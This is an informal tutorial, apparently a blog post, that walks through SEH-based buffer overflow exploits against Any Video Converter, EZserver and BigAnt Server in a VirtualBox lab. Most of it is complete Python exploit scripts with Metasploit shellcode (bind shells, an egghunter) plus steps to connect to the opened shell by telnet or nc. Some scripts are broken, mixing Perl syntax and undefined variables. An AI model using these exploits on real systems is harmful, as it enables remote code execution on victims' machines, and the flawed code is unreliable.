Exploit Any Video Conveter (Local)

1.      you make file fuzzer , with file name “fuzzerany.py”

            #!/usr/bin/python

namafile="profiles_v2.xml"

junk = “\x41” x 700

buff="<root>\n"

buff=buff + "<categories>\n"

buff=buff + "<category name=\""+junk+"\" id=\"0\" icon=\"cat_all.bmp\" desc=\"All Profiles\"/>\n"

buff=buff + "</categories>\n"

buff=buff + "<groups></groups>\n<profiles></profiles>\n</root>\n"

file=open(namafile,"w")

file.write(buff)

print("berhasil yes...")

file.close()

2.      copy file result fuzzing to folder in anyvideoConveter, running ony video and then running ollydbg, observe the results, will have register EIP as shown below

 

            view SHE chain and do press Shift + F9 , and this result

 

 

3.      make create pattern, and create pattern offset

4.      search value POP r32, POP r32 and RETN, and this result

5.      copy file DVCAPTUREddl from windows to linux, and the destination paste in folder root/tmp, and do "./msfpescan"

6.      edit your “fuzzerany.py” become

#!/usr/bin/python

namafile="profiles_v2.xml"

junk = “\x90” x 328

buffer+="\xcc\xcc\xcc\xcc"

buffer+="\x41\x41\x41\x41"

buff="<root>\n"

buff=buff + "<categories>\n"

buff=buff + "<category name=\""+junk+"\" id=\"0\" icon=\"cat_all.bmp\" desc=\"All Profiles\"/>\n"

buff=buff + "</categories>\n"

buff=buff + "<groups></groups>\n<profiles></profiles>\n</root>\n"

file=open(namafile,"w")

file.write(buff)

print("berhasil yes...")

file.close()

7.      and the last (again) added result generate payload..

active “msfweb” →   open browser type “127.0.0.1:55555”  → choose payload → micrsoft bind shell.sis as shown below

 

after it emerged the results generated payload Become edit result :

 

#!/usr/bin/python

namafile="profiles_v2.xml"

junk="\x90"* 328

junk+="\xeb\x06\x90\x90"

junk+="\x33\xE6\x01\x10"

junk+="\x90" * 16

shellcode=("\xba\x60\xf6\x4d\x9a\xda\xcc\xd9\x74\x24\xf4\x58\x33\xc9\xb1\x51"

"\x83\xc0\x04\x31\x50\x0e\x03\x30\xf8\xaf\x6f\x4c\x6e\xdb\xdd\x44"

"\x96\xe4\x21\x6b\x09\x90\xb2\xb7\xee\x2d\x0f\x8b\x65\x4d\x95\x8b"

"\x78\x41\x1e\x24\x63\x16\x7e\x9a\x92\xc3\xc8\x51\xa0\x98\xca\x8b"

"\xf8\x5e\x55\xff\x7f\x9e\x12\xf8\xbe\xd5\xd6\x07\x83\x01\x1c\x3c"

"\x57\xf2\xf5\x37\xb2\x71\x5a\x93\x3d\x6d\x03\x50\x31\x3a\x47\x39"

"\x56\xbd\xbc\xc6\x4a\x36\xcb\xa4\xb6\x54\xad\xf7\x86\xbf\x49\x7c"

"\xab\x0f\x19\xc2\x20\xfb\x6d\xde\x95\x70\xcd\xd6\xbb\xee\x40\xa8"

"\x4d\x03\x0c\xcb\x84\xbd\xfe\x55\x41\x71\x33\xf1\xe6\x06\x01\x5e"

"\x5d\x16\xb5\x08\x96\x05\xca\xf3\x78\x29\xe5\x5c\xf0\x30\x6c\xe3"

"\xef\xb3\x73\xb6\x85\xc1\x8c\xe8\x32\x1f\x7b\xfd\x6e\xc8\x83\x2b"

"\x23\xa4\x28\x80\x97\x09\x9c\x65\x4b\x71\xf2\x0f\x03\x9c\xaf\xa9"

"\x80\x17\xae\xa0\x4f\x8c\x2b\xba\x48\x9b\xb4\xec\x3d\x34\x1a\x45"

"\x3d\xe4\xf4\xc1\x6c\x2b\xec\x5e\x90\xe2\xbd\x35\x91\xdb\x2a\x50"

"\x24\x5a\xe3\xcd\x48\xb4\xa4\xa5\xe2\x6c\xba\x95\x98\xe7\xa3\x6c"

"\x59\x8e\x7c\x71\xb3\x24\x7c\x5d\x5a\xad\xe6\x3b\xcb\x52\x8a\x4a"

"\xee\xff\x04\x15\xd8\x33\x2d\x42\x70\x88\xa7\x6e\xb4\xd0\x4b\xc4"

"\x49\x92\x86\xe6\xf4\x3f\x4a\x9b\x83\x07\xc7\x08\xd8\x10\x65\xb0"

"\xac\xf7\x76\x39\x97\x08\x5e\x9a\x40\xa5\x0e\x4d\x3e\x23\xb0\x3c"

"\x91\xe6\xe3\x41\xc1\x61\xa9\x64\xe7\xbf\xe2\x69\x3e\x55\xfa\x6a"

"\x88\x55\xd4\x1f\xa0\x55\x56\xdb\x2b\x59\x8f\xb1\x4c\x75\x58\x4b"

"\x6b\x94\xea\xe0\x74\x8f\xf2\xd6"

)

buff="<root>\n"

buff=buff + "<categories>\n"

buff=buff + "<category name=\""+junk+shellcode+"\" id=\"0\" icon=\"cat_all.bmp\" desc=\"All Profiles\"/>\n"

buff=buff + "</categories>\n"

buff=buff + "<groups></groups>\n<profiles></profiles>\n</root>\n"

file=open(namafile,"w")

file.write(buff)

print("berhasil yes...")

file.close()

then, running AnyVideo Conveter and crashh

 do telnet or nc in terminal on backtrack for into System C windows
 

  

EzServer PART II

in the last posting, im not into system C, because there problem on the calculation stack. . ok we repetead disscuss

1. see, we not finish in statement "telnet", this is solution
edit our file fuzzing "fuzzereasy.py", become

#!/usr/bin/python
import socket
target_address="192.168.56.101"
target_port=8000
buffer="\x90" * 5879
buffer+="\xeb\x06\x90\x90"
buffer+="\x96\x96\x20\x10"
buffer+="\x90" * (5954-len(buffer))
buffer+="\r\n\r\n"
#buffer= "\x41" * 6000 + "\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address, target_port))
sock.send('GET /'+buffer+'HTTP/1.1')
print("Yes")
sock.close()

and you do fuzzing "fuzzerserver.py"

2. calculation to determine its true or not, we use the "calc"
open browser and type "127.0.0.1:55555" choose payload-windows execute command, and fill it in dialog box..as picture below

and do click generate payload, and this result

and then -- edit ou file fuzzer , become..

#!/usr/bin/python
import socket
target_address="192.168.56.101"
target_port=8000
buffer="\x90" * 5879
buffer+="\xeb\x06\x90\x90"
buffer+="\x96\x96\x20\x10"
buffer+="\x90" * (5954-len(buffer))
buffer+=("\x33\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xb5"
"\xde\x82\x48\x83\xeb\xfc\xe2\xf4\x49\x36\xc6\x48\xb5\xde\x09\x0d"
"\x89\x55\xfe\x4d\xcd\xdf\x6d\xc3\xfa\xc6\x09\x17\x95\xdf\x69\x01"
"\x3e\xea\x09\x49\x5b\xef\x42\xd1\x19\x5a\x42\x3c\xb2\x1f\x48\x45"
"\xb4\x1c\x69\xbc\x8e\x8a\xa6\x4c\xc0\x3b\x09\x17\x91\xdf\x69\x2e"
"\x3e\xd2\xc9\xc3\xea\xc2\x83\xa3\x3e\xc2\x09\x49\x5e\x57\xde\x6c"
"\xb1\x1d\xb3\x88\xd1\x55\xc2\x78\x30\x1e\xfa\x44\x3e\x9e\x8e\xc3"
"\xc5\xc2\x2f\xc3\xdd\xd6\x69\x41\x3e\x5e\x32\x48\xb5\xde\x09\x20"
"\x89\x81\xb3\xbe\xd5\x88\x0b\xb0\x36\x1e\xf9\x18\xdd\x2e\x08\x4c"
"\xea\xb6\x1a\xb6\x3f\xd0\xd5\xb7\x52\xbd\xe3\x24\xd6\xde\x82\x48")
buffer+="\r\n\r\n"
#buffer= "\x41" * 6000 + "\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address, target_port))
sock.send('GET /'+buffer+'HTTP/1.1')
print("Yes")
sock.close()











running Ezserver without you running ollydbg, and make fuzzing,

appear  running EZserver before fuzzing

and appear after fuzzing

if appear calculator then value offset is true

3. at the last, make egghunter, edit for file fuzzer ..
put payload from metasploit framework, and then your copy result payload in the file fuzzing become -->>

#!/usr/bin/python
import socket
target_address="192.168.56.101"
target_port=8000
#buffer="\x90" * 5879
buffer="\x90" * 5457


hunt = ("\x66\x81\xCA\xFF\x0F\x42\x52\x6A"
"\x02\x58\xCD\x2E\x3C\x05\x5A\x74"
"\xEF\xB8\x77\x30\x30\x74\x8B\xFA"
"\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")


payload = ("\xbe\x84\x65\x5d\x58\xda\xd9\x29\xc9\xb1\x51\xd9\x74\x24\xf4\x5b"
"\x31\x73\x12\x83\xc3\x04\x03\xf7\x6b\xbf\xad\x0b\x19\xd4\x03\x1b"
"\x27\xd5\x63\x24\xb8\xa1\xf0\xfe\x1d\x3d\x4d\xc2\xd6\x3d\x4b\x42"
"\xe8\x52\xd8\xfd\xf2\x27\x80\x21\x02\xd3\x76\xaa\x30\xa8\x88\x42"
"\x09\x6e\x13\x36\xee\xae\x50\x41\x2e\xe4\x94\x4c\x72\x12\x52\x75"
"\x26\xc1\xb3\xfc\x23\x82\x9b\xda\xaa\x7e\x45\xa9\xa1\xcb\x01\xf2"
"\xa5\xca\xfe\x0f\xfa\x47\x89\x63\x26\x44\xeb\xb8\x17\xaf\x8f\xb5"
"\x1b\x7f\xdb\x89\x97\xf4\xab\x15\x05\x81\x0c\x2d\x0b\xfe\x02\x63"
"\xbd\x12\x4a\x84\x17\x8c\x38\x1c\xf0\x62\x8d\x88\x77\xf6\xc3\x17"
"\x2c\x07\xf3\xcf\x07\x1a\x08\x34\xc8\x1a\x27\x15\x61\x01\xae\x28"
"\x9c\xc2\x2d\x7f\x35\xd1\xce\xaf\xa1\x0c\x39\xba\x9f\xf8\xc5\x92"
"\xb3\x55\x69\x49\x67\x19\xde\x2e\xd4\x62\x30\xd6\xb2\x8d\xed\x70"
"\x10\x27\xec\xe9\xfe\x93\xf5\x61\x38\x8c\xf6\x57\xac\x23\x58\x02"
"\xce\x94\x32\x08\x9d\x3b\x2a\x07\x21\x95\xff\xf2\x22\xca\x68\x19"
"\x95\x6d\x21\xb6\xd9\xa4\xe2\x6c\x72\x1c\xfc\x5c\xe9\xf6\xe5\x25"
"\xc8\x7e\xbd\x2a\x02\xd5\xbe\x04\xcd\xbc\x24\xc2\x7a\x22\xc8\x83"
"\x9e\xce\x42\xca\x49\xc3\xea\x0b\xe3\x9f\x65\x31\xc5\xdf\x85\x1f"
"\xd8\xa2\x44\xa1\x67\x0f\x04\xd0\x12\x77\x81\x41\x49\xef\xa7\x6b"
"\x3d\xe6\xb8\xe6\x06\xf8\x91\x53\xd0\x54\x4f\x32\x8f\x32\x6e\xe5"
"\x7e\x96\x21\xfa\x51\x70\x6f\xdd\x57\x4f\x3c\x22\x81\x25\x3c\x23"
"\x19\x45\x12\x50\x31\x45\x10\xa2\xda\x4a\xc1\x78\xdc\x65\x86\x8c"
"\xa8\x82\x08\x3f\x52\x5c\x49\x6f")



buffer+= "w00tw00t"
buffer+= payload
buffer+= "\x90" * 70
buffer+= "\xeb\x06\x90\x90"
buffer+= "\x96\x96\x20\x10"
buffer+= "\x90" * 16
buffer+= hunt
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address, target_port))
sock.send('GET /'+buffer+'HTTP/1.1')
print("Yes")
sock.close()





running Ezserver
and this resullt 





do fuzzing with terminal

 type "telnet "ip_target" "port_target" "

from above picture seen that we've managed to do explotation
Alhamdullilah

Exploit EZserver

1. install EZserver and running in windows

2. make file fuzzer with filename " fuzzerserver.py" and this the script



3.  Running Ollydbg and EZserver, and do fuzzer in bactrack this result

this Result SEH Chain and the press Shift + F9

4.Look For POP and Retn
copy file "MSVCRTD.DLL" from windows and paste in folder tmp in backtrack, and make running tool msfpescan, like this

and the click view-exuctables modules- choose "MSVCRTD.DLL" and double click

Right CLick in - search for - and will appear dialog box, your type

like the one in the picture

 and click button Find, and this result

5. Search offset for Overwrite SEH

create panttern offset, like this example

 after create pattern and open create result , copy this result in file "fuzzerserver.py"

after copy, you run Ezserver and olldbg then do fuzzing, you will can result this 

cek SEH chainand have result ths

and the press Shift + F9, and this result

make pattern offset

edit file "fuzzerserver.py" become

and running Ezserver and Ollydbg, and do fuzzing, after fuzzing cek SEH chain and the Press Shift+F9

 Press shift + F9

Exploit BigAnt Server

1. install BigAnt and ollydbg on windows in visualbox
2. make file, author make file name for fuzzer with "bigant.py", its content

#!/usr/bin/python
import socket
target_address="192.168.56.101"
target_port=6660
buffer= "USV "+ "\x41" * 2500 + "\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address, target_port))
sock.send(buffer)
print("yes")
sock.close()

3. running BigAnt then ollydbg, run in ollydbg, running on the backtrack ,do fuzzer .

 

and this result for SEH chain

 the, press Shift + F9 for to direct Data in SEH Chain to Memory.

 and the, how know the data buffer in memory? right click for row stack  choose file dump 

 

4. Finding  address " POP, POP retn"
copy file vbajet32.dll from windows and paste in backtrak on folder "tmp"

further, clikc view-execute model-search for - sequence of command, 

and will appear.

after find , will find appear

5. Search offset for overwrite SEH
edit file "bigantfuzzer.py" become
#!/usr/bin/python
import socket
target_address="192.168.56.101"
target_port=6660
buffer= "USV "
buffer+="*************"+"\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address, target_port))
sock.send(buffer)
print("yes")
sock.close()

 nb = ***** (result make create pattern offset)
 then, running bigant and ollydbg , and make fuzzing, this result

value 966 be required for can to trigger SEH Handler.

6. Edit file "BigAntFuzzer.py" wanna be

#!/usr/bin/python
import socket
target_address="192.168.56.101"
target_port=6660
buffer= "USV "
buffer+="\xCC\xCC\xCC\xCC" 
buffer+="\x41\x41\x41\x41" 
buffer+="\x90" * (2504-len(buffer)) 
buffer+=""
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address, target_port))
sock.send(buffer)
print("yes")
sock.close()

running BigAnt adn ollydbg , finish running  cek SEH Chain and this result

press shift + F9 and this result

under, this picture result file dump

 

 7. Make ShellCode

this result there is nothing wrong "Bad Carachter"

cek bad caracher,
#!/usr/bin/python
import socket
target_address="192.168.56.101"
target_port=6660
buffer= "USV "
buffer+="\xCC\xCC\xCC\xCC" 
buffer+="\x41\x41\x41\x41" 
buffer+="\x90" * (2504-len(buffer)) 
buffer+="***********"  #row 1 in result generate payload
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address, target_port))
sock.send(buffer)
print("yes")
sock.close()

cek result bad character this way ..
running bigant and ollydbg, and make a fuzzing, if result in SEH Chain not "vbajet332.dll" this wrong otherwise. if not wrong edit file "bigantfuzzer.py"  and Add a script generates results.. this example

#!/usr/bin/python
import socket
target_address="192.168.56.101"
target_port=6660
buffer= "USV "
buffer+= "\x90" * 962
buffer+= "\xeb\x06\x90\x90"
buffer+= "\x6A\x19\x9A\x0F"
buffer+= "\x90" * 16
buffer+= "\xbe\x1f\x10\xd7\xf0\x29\xc9\xb1\x51\xdb\xc1\xd9\x74\x24\xf4\x5a"
buffer+= "\x31\x72\x0e\x83\xea\xfc\x03\x6d\x1a\x35\x05\x6d\x70\x52\xab\x65"
buffer+="\x7c\x5b\xcb\x8a\x1f\x2f\x58\x50\xc4\xa4\xe4\xa4\x8f\xc7\xe3\xac"
buffer+="\x8e\xd8\x67\x03\x89\xad\x27\xbb\xa8\x5a\x9e\x30\x9e\x17\x21\xa8"
buffer+="\xee\xe7\xba\x98\x95\x28\xc8\xe7\x54\x62\x3c\xe6\x94\x98\xcb\xd3"
buffer+="\x4c\x7b\x1c\x56\x88\x08\x03\xbc\x53\xe4\xda\x37\x5f\xb1\xa9\x18"
buffer+="\x7c\x44\x45\xa5\x50\xcd\x10\xc5\x8c\xcd\x43\xd6\xfc\x36\xe7\x53"
buffer+="\xbd\xf8\x63\x23\x4e\x72\x03\xbf\xe3\x0f\xa4\xb7\xa5\x67\xab\x89"
buffer+="\x57\x94\xe3\xea\xbe\x02\x57\x72\x57\xf8\x65\x12\xd0\x8d\xbb\xbd"
buffer+="\x4a\x8d\x6c\x29\xb8\x9c\x71\x92\x6e\xa0\x5c\xbb\x07\xbb\x07\xc2"
buffer+="\xf5\x4c\xca\x91\x6f\x4f\x35\xc9\x18\x96\xc0\x1c\x75\x7f\x2c\x08"
buffer+="\xd5\xd3\x81\xe7\x89\x90\x76\x44\x7d\xe8\xa9\x2c\xe9\x07\x16\xd6"
buffer+="\xba\xae\x47\x83\x55\x15\x9d\xdb\x62\x02\x5d\xcd\x07\xbd\xf0\xa4"
buffer+="\x28\x6d\x9a\xe2\x7a\xa0\xb2\xbd\x7b\x6b\x17\x14\x7b\x44\xf0\x73"
buffer+="\xca\xe3\x48\x2c\x32\x3d\x1a\x86\x98\x97\x64\xf6\xb2\x70\x7c\x8f"
buffer+="\x72\xf9\xd5\x90\xad\xaf\x26\xbe\x34\x3a\xbd\x58\xd1\xd9\x50\x2d"
buffer+="\xc4\x74\xfb\x74\x2e\x45\x72\x61\x5a\x11\x0c\x8f\xaa\x59\xfd\xe5"
buffer+="\x33\x1b\x2f\x07\x89\xb0\xbc\x7a\x74\xf1\x69\x2f\x22\x69\x1c\xd1"
buffer+="\x86\x7c\x1f\x58\xad\x7f\x09\xf9\x7a\xd2\xe7\xac\xd5\xb8\x06\x1f"
buffer+="\x87\x69\x58\x60\xf7\xfa\xf7\x47\xfd\x34\x54\x88\x28\xa2\xa4\x89"
buffer+="\xe2\xcc\x8b\xfe\x5a\xcf\xaf\xc4\x01\xd0\x66\x96\x36\xfe\xef\x68"
buffer+="\x11\x1d\x9c\xc7\x5e\x34\x9c\x37"
buffer+= "\x90" * (2054-len(buffer))
buffer+= "\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address, target_port))
sock.send(buffer)
print("yes")
sock.close()

8. at the last, running bigant, make fuzzing  and the do telnet